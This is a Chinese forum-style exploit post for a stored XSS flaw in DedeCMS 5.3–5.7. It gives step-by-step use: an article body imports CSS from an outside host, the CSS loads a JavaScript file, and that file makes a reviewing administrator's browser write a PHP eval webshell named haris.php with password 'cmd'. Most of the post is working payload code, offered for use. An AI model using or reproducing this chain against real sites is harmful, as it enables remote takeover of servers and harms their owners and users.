dedecms xss oday通杀所有版本(T00ls首发) by haris

作者:haris

漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell

为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。

下面说说利用方法。
条件有2个:
1.开启注册
2.开启投稿

注册会员----发表文章

内容填写:

<style>@im/port'/http://xxx.com/xss.css';</style>
新建xss.css,内容:

body{
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")')
}

新建xss.js文件,内容:

var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request; 
function getFolder( url ){
    obj = url.split('/')
    return obj[obj.length-2]
}
oUrl = top.location.href;
u = getFolder(oUrl);
add_admin(); 
function add_admin(){
var url= "/"+u+"/sys_sql_query.php";
var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++";  
xmlhttp.open("POST", url, true); 
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.send(params);
}

当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd

dedecms xss oday通杀所有版本 可getshell相关推荐

  1. thinkphp日志泄漏漏洞_ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...

    ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞,漏洞存在于ThinkPHP/Lib/Core/Model.class.php 文件 根据官方文档对"防止SQL注入" ...

  2. 测试php框架漏洞,ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...

    作者: seay 下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑.建议类似的厂商不要再 ...

  3. /plus/recommend.php sql注入漏洞,代码审计:ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法 | Seay 渗透 编程 代码审计 网络安全博客...

    显示不全请点击全屏阅读 下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑.建议类似的厂商 ...

  4. 用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本)

    用友TurboCRM存在通用sql注入.http://**.**.**.**:8081/login/login.php如下图找到找回密码页 访问http://**.**.**.**:8081/logi ...

  5. php去除正方教务空格,通用型正方教务(通杀各版本)存在注入(不需

    某个接口页面存在oracle盲注,可以获得当前用户数据库,dump教师用户表,分析密文加密特征(前人研究成果+基友助攻),破译加密的密码.前台管理员登陆,后台文件上传基于黑名单原理,过滤u完全,上传特 ...

  6. /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -

    DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...

  7. e7xue.php漏洞_简要分析最近的dedecms通杀漏洞以及漏洞补丁的绕过

    话说文章写得菜不要紧,首先标题要跟大牛一样! 作者:单恋一支花 出自:t00ls 转载请注明出处,如有雷同,纯属别人抄袭,嘿嘿! 一:写在前面 今天晚上想老婆了,失眠了,蛋裂之余,进吐司寻找基友,惊现 ...

  8. 漏洞进阶之——XSS万能超级无敌全通杀payload

    XSS万能超级无敌全通杀payload XSS 漏洞简介 payload--on,js事件 payload--标签 payload--过狗过墙思路 本人常用payload分享 ------------ ...

  9. V5shop 8.2版本下通杀注入漏洞

    漏洞危害:高危 一.漏洞文件:cart.aspx 搜索关键词:inurl:scoreindex.aspx exp : /cart.aspx?act=buy&id=1 and (Select T ...

最新文章

  1. centOS Redhat yum的配置
  2. 【博客话题】我与Linux的不解情缘
  3. Sublime Text 3103 Crack 破解 注册码(亲测有效)
  4. HashMap与HashTable联系与区别
  5. 答疑:有关一例EXT3文件系统故障
  6. 基于jsp+servlet完成的用户注册
  7. 四步创建TCP客户端
  8. 色彩艺术海报PSD模板 | 用色彩挑动你的情趣
  9. 拓端tecdat|R语言用rle,svm和rpart决策树进行时间序列预测
  10. kindle 新手入门
  11. 最好最实用的PHP二次开发教程
  12. 手机软件测试规范(含具体用例)
  13. 什么是零代码开发平台,为什么企业IT应该重视?
  14. 学弟想「白嫖」优质大学课,姐直接甩给他 8 个网站
  15. 智商黑洞(门萨Mensa测试)4
  16. AT指令集详解[zt]
  17. Django 新建自定义用户后无法创建表的问题
  18. CSDN盲盒中奖MacBook Surprise
  19. pycharm编辑器如何用鼠标滚轮随时放大缩小代码
  20. 2023第九届中国国际养老服务业博览会5月5日在北京召开

热门文章

  1. 功率二极管的损耗分析和选型原则
  2. pascal和python那个好学_从Pascal到Python
  3. MAXScript脚本用于建筑可视化
  4. 想进大厂, Jira 管理平台你会用么?
  5. JS快速解析Excel文件
  6. 限制html窗口最小宽度,给页面一个最小宽度,小于这个宽度时,出现横向滚动条...
  7. Jetpack Compose ScrollableTabRow 如何调整最小宽度
  8. Ruby Jquery 地图,地理信息相关资源
  9. FX3U PLC源代码,stm32芯片。 全套硬件,软件源码,可以直接用GX Works2编程直接写入。 带读保护版本
  10. 1D/2D/3D卷积详解